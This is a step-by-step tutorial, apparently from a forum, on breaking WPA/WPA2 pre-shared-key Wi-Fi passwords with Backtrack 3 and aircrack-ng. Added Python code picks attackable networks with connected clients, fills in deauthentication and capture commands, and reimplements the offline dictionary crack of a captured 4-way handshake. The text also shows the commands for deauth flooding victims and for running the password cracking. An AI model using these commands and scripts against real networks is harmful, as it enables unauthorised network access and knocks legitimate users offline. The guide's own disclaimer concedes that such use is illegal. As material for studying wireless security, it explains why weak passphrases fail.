Penetration testing WPA

Here is the key for this guide:
Black text = regular info
Blue text = important notes to remember
Red text = ACTUAL commands you type in
Yellow = extra info behind what you're doing

Standard Disclaimer: Breaking anyone's wifi encryption is illegal even if you do not use their
internet. I take no responsibility for anything you do with this guide. This is meant for
informative purposes only.

There is a major difference between WEP encryption and WPA encryption. That difference is
security. WEP encryption can be broken just about every time. It doesn't matter if:
A. people are on the network or not
B. password is easy like "football" or hard like "anw034n98ns0NG"
C. SKA (Shared Key Authentication) is used or not
Regardless of these factors, WEP encryption can be broken. I've already written a guide for
that. The link to it is in my signature.

IMPORTANT NOTE: WPA, on the other hand, is another story. This guide attacks WPA (and WPA2) in
its pre-shared key form, the home-router setup where everyone uses the same password. There
are 2 MAJOR factors that MUST BE PRESENT in order for you to break it. They are:
A. A client MUST connect to the network while you are listening. In practice that means
someone is already connected so you can force them to reconnect; if nobody is connected,
all you can do is wait for someone to join.
B. The password MUST be in your dictionary file. What you capture only lets you test guesses
offline; it does not hand you the password by itself.

Let's get started.

For this guide, you will need the free linux distribution known as Backtrack 3. It can be
downloaded here:
http://www.remote-exploit.org/backtrack_download.html

IMPORTANT NOTE: Once you download it, burn the iso image to a cd. Don't just drag and
drop the file to the cd and burn it. Actually burn the image file using image burning software
so it will work correctly. ImgBurn is excellent free image burning software. It can be found
here:
http://www.imgburn.com/index.php?act=download

Now put the cd in and reboot your computer. It should automatically begin to load up
Backtrack 3. Pay attention, though, because it will pop up some boot options for only about
4 seconds. I have ALWAYS picked the VESA/KDE option for booting into Backtrack 3. It has
always been the most compatible with the systems I've tested it on. If it doesn't work well
for you, try some of the other boot options.

Once Backtrack 3 loads up, click the little black box that is in the bottom left next to where
the "start button" would be in Windows. This will open up a Konsole window. Go ahead and
open up 2 different Konsole windows. We will need both of them.

In the first Konsole window, type:
ifconfig
This will tell you what your wireless interfaces are. They will typically be something like
wifi0, ath0, ath1, eth0, eth1, etc.
(mine are wifi0 and ath0) Atheros cards on the madwifi-ng driver that Backtrack 3 ships show
two names: wifi0 is the physical card and ath0 is a virtual interface sitting on top of it,
which is why the commands below touch both. From here on out, when I tell you a command to
type in, replace "ath0" with whatever interface your computer uses. If your card shows only
one interface (eth1, for example), skip the stop step and give that one name to airmon-ng
start; airmon-ng prints which interface it put into monitor mode, and that is the name to
use for the rest of the guide.
Once you know your wireless interfaces, type:
airmon-ng stop ath0
then type:
ifconfig wifi0 down
then type:
airmon-ng start wifi0

[screenshot in the original of the airmon-ng output]
What this did is reset your wireless interface and bring it back up in what's called
"monitor mode". A card in monitor mode hands you every 802.11 frame it hears, not just the
frames addressed to it, and it does so without being joined to any network. That is what
lets you "monitor" the airwaves and pick up the wireless handshake later on. (you'll learn
what a "wireless handshake" is!)
Now type:
airodump-ng ath0

This will start the airodump-ng program, which will begin to rapidly list all of the wifi
networks within range of you. Look under the "ENC" heading in this list. This is telling
you the type of encryption that these networks are using. "OPN" means there is no
encryption. WEP, WPA and WPA2 are self explanatory, and WPA2 is attacked exactly the same
way as WPA in this guide. Also check the "AUTH" column: "PSK" means a shared password,
which is what a dictionary attack can recover; "MGT" means WPA-Enterprise, where every user
has their own login and there is no single passphrase to guess. Look through the networks
and zero in on those that are using WPA or WPA2 with PSK.

Now, once you have found your WPA networks, look below into the client list. This is the list
of computers that are using the various networks. The far left set of numbers/letters is the
bssid of the router that they are connected to; a computer listed as "(not associated)" is
only probing and is not on any network. Look through these and see if any of these match
the bssid of the network that you want to crack. If none of these match the network you
are trying to break, you cannot capture a handshake right now: you need a client that is
connected (so you can knock it off and catch the reconnection) or one that joins while you
are watching. Either leave airodump-ng running and wait, or come back another day.

If someone IS on the network you want to break, then congrats because you are one step
closer to your goal.

[picture in the original showing which bssid and client to look for]
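The same check done over a saved scan instead of by eye. This is an added example and not part of the original tutorial: it assumes airodump-ng was started with "-w prefix", which also writes prefix-01.csv, a table of access points followed by a table of stations with the bssid each station is associated to. The script is mine, the CSV sample is constructed to match that layout, and the network names, MAC addresses, interface name and the "wpa" capture prefix in the suggested commands are made up. It keeps only WPA/WPA2 networks with PSK authentication that have at least one associated client, which is exactly what this step is looking for, and drops WEP and WPA-Enterprise (MGT) networks.

```python
import csv
import io

# Constructed sample in the layout of the prefix-01.csv that airodump-ng writes when started with
# "-w prefix": an access-point table, a blank line, then a station (client) table. Every MAC
# address and network name here is made up for the example.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-03-01 20:00:01, 2009-03-01 20:04:30,  6,  54, WPA2, CCMP, PSK, -41,  120,   0,   0.  0.  0.  0,   9, HomeNet-5, 
00:11:22:33:44:66, 2009-03-01 20:00:02, 2009-03-01 20:04:31, 11,  54, WPA, TKIP, PSK, -67,   80,   0,   0.  0.  0.  0,   7, linksys, 
00:11:22:33:44:77, 2009-03-01 20:00:03, 2009-03-01 20:04:29,  1,  54, WPA2, CCMP, MGT, -55,   90,   0,   0.  0.  0.  0,   8, CorpWLAN, 
00:11:22:33:44:88, 2009-03-01 20:00:04, 2009-03-01 20:04:28,  3,  11, WEP, WEP, , -80,   30,  12,   0.  0.  0.  0,   6, oldnet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:00:00:01, 2009-03-01 20:00:10, 2009-03-01 20:04:30, -50,   44, 00:11:22:33:44:55, HomeNet-5
AA:BB:CC:00:00:02, 2009-03-01 20:00:11, 2009-03-01 20:04:29, -60,   12, 00:11:22:33:44:77, 
AA:BB:CC:00:00:03, 2009-03-01 20:00:12, 2009-03-01 20:04:20, -75,    3, (not associated), linksys,HomeNet-5
"""


def parse_airodump_csv(text):
    """Return {bssid: access-point record}, each with the MACs of its associated clients."""
    aps, stations, section = {}, [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [field.strip() for field in row]
        if not any(row):
            continue
        if row[0] == "BSSID":
            section = "ap"
        elif row[0] == "Station MAC":
            section = "station"
        elif section == "ap" and len(row) >= 15:
            # ESSID is taken as one field; a network name containing a comma would need more care.
            aps[row[0]] = {"bssid": row[0], "channel": int(row[3]), "privacy": row[5],
                           "cipher": row[6], "auth": row[7], "essid": row[13], "clients": []}
        elif section == "station" and len(row) >= 6:
            stations.append({"mac": row[0], "bssid": row[5], "probed": [p for p in row[6:] if p]})
    for station in stations:  # "(not associated)" never matches an access point, so it is skipped
        if station["bssid"] in aps:
            aps[station["bssid"]]["clients"].append(station["mac"])
    return aps


def attackable_targets(aps):
    """WPA/WPA2 with a pre-shared key and at least one associated client: the only networks the
    handshake capture in this guide can work on right now. MGT (enterprise) and WEP are left out."""
    return [ap for ap in aps.values()
            if ap["privacy"].startswith("WPA") and ap["auth"] == "PSK" and ap["clients"]]


def capture_commands(ap, iface="ath0", prefix="wpa"):
    """The two commands of the capture step, filled in for one target (first client picked).
    iface and prefix are assumed names, not values from the scan."""
    return [
        f"airodump-ng -c {ap['channel']} --bssid {ap['bssid']} -w {prefix} {iface}",
        f"aireplay-ng --deauth 10 -a {ap['bssid']} -c {ap['clients'][0]} {iface}",
    ]


if __name__ == "__main__":
    for ap in attackable_targets(parse_airodump_csv(SAMPLE_CSV)):
        print(f"{ap['essid']} ({ap['bssid']}, ch {ap['channel']}, {ap['privacy']}/{ap['cipher']}) "
              f"clients: {', '.join(ap['clients'])}")
        for cmd in capture_commands(ap):
            print("   ", cmd)
```

Run against the sample it reports only HomeNet-5: linksys is PSK but has no client, CorpWLAN has a client but is MGT, and oldnet is WEP. Point it at a real prefix-01.csv by reading the file into parse_airodump_csv instead of SAMPLE_CSV.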
Now, go to the second Konsole window that you opened earlier. It's time to try and capture
the handshake.
A handshake is the term for what happens when a computer is authenticated on a WPA network
(the "4-way handshake"). The password itself never goes over the air, and neither does any
key. Instead, both the computer and the router turn the password and the network name into a
256-bit master key, they exchange two random numbers (nonces), each derives a session key
from the master key, the nonces and the two MAC addresses, and then they prove to each other
that they ended up with the same session key by attaching a checksum (the MIC) to the
handshake messages. This is what we are after: with the nonces, the MAC addresses and one of
those checksummed messages in hand, we can repeat the same computation for every password
guess and see which guess reproduces the captured checksum. The key is not "in" the
handshake; the handshake is what lets us test guesses offline. Without the handshake, we are
stuck.

The way that you capture the handshake is to send a signal to the router that will very
briefly disconnect the computer that is already connected. That computer will automatically
try and reconnect with the router and when it does, we will be there monitoring the
airwaves to pick up the handshake.

First, back in the first Konsole window, stop the scan (Ctrl-C) and restart airodump-ng
locked to the target's channel and writing to a file. Otherwise it keeps hopping channels
and misses the reconnection, and nothing gets saved to disk for aircrack-ng to work on:
airodump-ng -c Channel_of_Router --bssid Mac_of_Router -w wpa ath0
Channel_of_Router is the "CH" column of the list you just looked at, and "-w wpa" names the
capture file (wpa-01.cap, written to the directory the command was run from).

Then, in the second Konsole window, type this command:
aireplay-ng --deauth 10 -a Mac_of_Router -c Mac_of_Client ath0

What this command will do is send the disconnect (deauthentication) command TEN times in a
row, each time as a burst of forged frames addressed to the client as if they came from the
router (and to the router as if they came from the client). The Mac_of_Router is the bssid
of the network. The Mac_of_Client is the mac address of the currently connected computer.
Injecting these frames needs a card and driver that support packet injection; if aireplay-ng
reports 0 ACKs every time, the frames are not reaching anyone (wrong channel, out of range,
or the card cannot inject). This is all illustrated in the picture below:
[picture in the original labelling Mac_of_Router and Mac_of_Client in the airodump-ng list]
While that command is running it should look like this:
[screenshot in the original of aireplay-ng sending the deauthentication frames]
If we are successful in capturing the handshake, the words "WPA handshake:" followed by the
router's bssid should pop up in the top right corner of our first Konsole window. It will
look like this:
[screenshot in the original of the "WPA handshake:" indicator]
If you have successfully made it this far, congratulations! Don't get too excited yet though,
the biggest roadblock of all is still ahead. It all comes down to how much effort they put into
their password AND how good your dictionary file is!
IMPORTANT NOTE: I am going to upload my personal dictionary files and provide the links
at the bottom of this tutorial. I have compiled these files from all over the web, deleted
most of the duplicates, and split them into several smaller files so that they could each be
run at different times rather than one massive file that takes up your computer for several
days.

Now that you have the handshake file, you can close one of the Konsole windows and just
use one. The Aircrack-ng program will be used now to test the handshake file against each
entry in your dictionary word lists. Every guess costs 4096 rounds of SHA-1 hashing before
it can be checked against the handshake, so this step is limited by your processor and is
slow on any machine. On Backtrack 3 it is somewhat slow in testing the keys. (typically
around 100-200 words tested per second) I downloaded the windows version of Aircrack-ng so
that I could reboot into Windows and have it run MUCH faster. (typically testing 400-450
words per second) The windows version of Aircrack-ng can be found here:

http://www.aircrack-ng.org

Don't worry about it saying you must develop your own dll's and whatnot in order to use the
features of the program. It will run dictionary attacks straight out of the installation so no
extra setup is needed.

Now you can run aircrack-ng straight from Backtrack 3 or save your handshake files to a
flash drive and reboot into windows. If you are wanting to reboot into Windows, look for
the capture file (the .cap file with the name you gave airodump-ng) in the directory you ran
airodump-ng from; on Backtrack 3 that should be one of the two directories that are on the
desktop. When you are ready, open up the command prompt and navigate to the directory where
Aircrack-ng is located. (In Backtrack 3 you can run aircrack-ng straight from the default
directory of the Konsole window. In Windows, you must navigate to the directory that it is
installed to. You will have to get into the "bin" subfolder of the main Aircrack-ng
directory.) Once you are ready, type this command:

aircrack-ng location-of-handshake -w location-of-dictionary-file

This command starts aircrack-ng, then tells it where to find the capture file. The "-w"
option is letting it know we are doing a dictionary attack and is followed by the location
of our dictionary file. It will then pop up a list of all networks that had packets captured
in this one file and mark the ones for which it found a complete handshake (you will see
"(1 handshake)" next to the network). After this command is typed in, you type in the number
of the network you want to crack, and it begins. If you would rather not be prompted, for
example when running several dictionary files one after another, add "-b" followed by the
router's bssid to the command and aircrack-ng goes straight to that network.

[screenshot in the original of this command in Backtrack 3]
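What aircrack-ng is doing in this step, written out in full. This is an added example, not code from the original tutorial or from aircrack-ng, and it also spells out the handshake description above: for each word in the list it derives the master key (PMK) with PBKDF2, derives the session key from the PMK, the two MAC addresses and the two nonces, and recomputes the MIC over message 2 of the 4-way handshake; a match means the word is the passphrase. The SSID, MAC addresses, nonces, passphrase and wordlist below are all invented, and the "captured" message 2 is built inside the script from those values rather than read out of a .cap file; a real run would pull the nonces, MACs and EAPOL frame out of the capture. The one check against something external is the PBKDF2 test vector published in IEEE 802.11i (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac
import struct

# Offset of the 16-byte Key MIC inside an EAPOL-Key frame (IEEE 802.11i):
# 4 (EAPOL header) + 1 (descriptor type) + 2 (key info) + 2 (key length)
# + 8 (replay counter) + 32 (nonce) + 16 (IV) + 8 (RSC) + 8 (key ID) = 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK (= PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmk_self_test() -> bool:
    """Published 802.11i test vector: passphrase "password", SSID "IEEE"."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return pmk_from_passphrase("password", "IEEE").hex() == expected


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_kck(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    """KCK = first 16 bytes of the PTK; it is the only part of the PTK needed to check the MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, frame_with_zeroed_mic, key_version) -> bytes:
    """Key MIC: HMAC-MD5 for descriptor version 1 (WPA/TKIP), HMAC-SHA1[:16] for version 2 (WPA2/CCMP)."""
    digest = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, frame_with_zeroed_mic, digest).digest()[:16]


def build_eapol_msg2(snonce, key_version) -> bytes:
    """Minimal message 2 of the 4-way handshake (client -> AP) with the MIC field zeroed."""
    key_info = 0x0100 | 0x0008 | key_version     # Key MIC flag, Pairwise flag, descriptor version
    desc_type = 2 if key_version == 2 else 254   # RSN (WPA2) vs original WPA descriptor type
    key_len = 16 if key_version == 2 else 32     # CCMP vs TKIP temporal key length
    body = (bytes([desc_type]) + struct.pack(">HH", key_info, key_len) + bytes(8)  # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16)                  # IV, RSC, ID, MIC
            + struct.pack(">H", 0))                                                 # no key data
    return bytes([1, 3]) + struct.pack(">H", len(body)) + body   # EAPOL version 1, type 3 (Key)


def crack_psk(ssid, ap_mac, client_mac, anonce, snonce, eapol_frame, wordlist):
    """Offline dictionary attack: recompute the MIC for each candidate, as aircrack-ng -w does."""
    key_version = struct.unpack(">H", eapol_frame[5:7])[0] & 0x7
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    for word in wordlist:
        if not 8 <= len(word) <= 63:   # 802.11i passphrases are 8-63 characters; skip the rest
            continue
        kck = derive_kck(pmk_from_passphrase(word, ssid), ap_mac, client_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, zeroed, key_version), captured_mic):
            return word
    return None


# Constructed handshake: every value below is invented for the example, nothing was captured.
SSID = "HomeNet-5"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("aabbcc000001")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
TRUE_PASSPHRASE = "sunflower42"
WORDLIST = ["football", "short", "letmein1", "sunflower42", "anw034n98ns0NG"]


def make_captured_msg2(passphrase, key_version=2) -> bytes:
    """Stand-in for the frame a real run would take from the .cap file: message 2 with a valid MIC."""
    frame = build_eapol_msg2(SNONCE, key_version)
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame, key_version) + frame[MIC_OFFSET + 16:]


def demo(key_version=2):
    return crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE,
                     make_captured_msg2(TRUE_PASSPHRASE, key_version), WORDLIST)


if __name__ == "__main__":
    print("PBKDF2 test vector OK:", pmk_self_test())
    print("recovered passphrase:", demo())
```

The 4096-iteration PBKDF2 in pmk_from_passphrase is where all the time goes, and it is also why the same wordlist has to be run again for every different network name: the SSID is the salt, so a PMK computed for one network is useless against another. "short" is skipped without being hashed, which is the same length rule aircrack-ng applies to its wordlist.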
After this is done, you simply sit back and wait. Probably not at your computer either. A
good dictionary file can take hours (or days) to crunch through. I have mine broken down in
a way that each one takes around 5 - 8 hours to run from start to finish. This way I can
leave it running overnight and if it fails, fire up the next list on the next night.

If all is successful with your aircrack-ng command, you will see this screen pop up as it
rapidly tries every password you have against the handshake file. When a guess matches,
aircrack-ng prints "KEY FOUND!" with the passphrase; if it reaches the end of the list
without a match, the password was not in that file and you move on to the next one. It
will look like this:
[screenshot in the original of aircrack-ng running through the dictionary]
This about wraps it up for the tutorial. Below are the links to my various dictionary files.

Download Dictionary Files Here

They all range from around 100 mb to 500 mb.
I tried to compress them to be more manageable and easy to download. I'm not posting a
virus scan of all of them. I have good rep and if you won't just test it yourself, then look
elsewhere for your dictionary files.

Post any questions you have and I will try to get to them as I have time.
Don't steal my work without giving me credit.

						
Other docs by akshay.bazad